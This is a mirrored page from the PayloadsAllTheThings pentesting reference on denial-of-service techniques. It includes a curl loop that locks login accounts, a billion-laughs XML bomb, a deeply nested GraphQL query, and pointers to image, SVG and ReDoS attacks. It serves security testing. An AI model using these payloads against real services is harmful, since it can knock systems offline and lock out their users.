ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-19 19:06:12 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
c82cd6408a
PayloadsAllTheThings/Denial of Service/README.md
Swissky e138308d3d References updated for CORS CRLF CSV
2024-11-04 18:00:07 +01:00

94 lines
4.1 KiB
Markdown
Raw Blame History

# Denial of Service
> A Denial of Service (DoS) attack aims to make a service unavailable by overwhelming it with a flood of illegitimate requests or exploiting vulnerabilities in the target's software to crash or degrade performance. In a Distributed Denial of Service (DDoS), attackers use multiple sources (often compromised machines) to perform the attack simultaneously.
## Summary
* [Examples](#examples)
* [Locking Customer Accounts](#locking-customer-accounts)
* [File Limits on FileSystem](#file-limits-on-filesystem)
* [Memory Exhaustion - Technology Related](#memory-exhaustion---technology-related)
* [References](#references)
## Examples
### Locking Customer Accounts
Example of Denial of Service that can occur when testing customer accounts.
Be very careful as this is most likely **out-of-scope** and can have a high impact on the business.
* Multiple attempts on the login page when the account is temporary/indefinitely banned after X bad attempts.
```ps1
for i in {1..100}; do curl -X POST -d "username=user&password=wrong" <target_login_url>; done
```
### File Limits on FileSystem
When a process is writing a file on the server, try to reach the maximum number of files allowed by the filesystem format. The system should output a message: `No space left on device` when the limit is reached.
| Filesystem | Maximum Inodes |
| --- | --- |
| BTRFS | 2^64 (~18 quintillion) |
| EXT4 | ~4 billion |
| FAT32 | ~268 million files |
| NTFS | ~4.2 billion (MFT entries) |
| XFS | Dynamic (disk size) |
| ZFS | ~281 trillion |
An alternative of this technique would be to fill a file used by the application until it reaches the maximum size allowed by the filesystem, for example it can occur on a SQLite database or a log file.
FAT32 has a significant limitation of **4 GB**, which is why it's often replaced with exFAT or NTFS for larger files.
Modern filesystems like BTRFS, ZFS, and XFS support exabyte-scale files, well beyond current storage capacities, making them future-proof for large datasets.
### Memory Exhaustion - Technology Related
Depending on the technology used by the website, an attacker may have the ability to trigger specific functions or paradigm that will consume a huge chunk of memory.
* **XML External Entity**: Billion laughs attack/XML bomb
```xml
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
```
* **GraphQL**: Deeply-nested GraphQL queries.
```ps1
query {
repository(owner:"rails", name:"rails") {
assignableUsers (first: 100) {
nodes {
repositories (first: 100) {
nodes {
}
}
}
}
}
}
```
* **Image Resizing**: try to send invalid pictures with modified headers, e.g: abnormal size, big number of pixels.
* **SVG handling**: SVG file format is based on XML, try the billion laughs attack.
* **Regular Expression**: ReDoS
## References
- [DEF CON 32 - Practical Exploitation of DoS in Bug Bounty - Roni Lupin Carta - October 16, 2024](https://youtu.be/b7WlUofPJpU)
- [Denial of Service Cheat Sheet - OWASP Cheat Sheet Series - July 16, 2019](https://cheatsheetseries.owasp.org/cheatsheets/Denial_of_Service_Cheat_Sheet.html)
Reference in New Issue View Git Blame Copy Permalink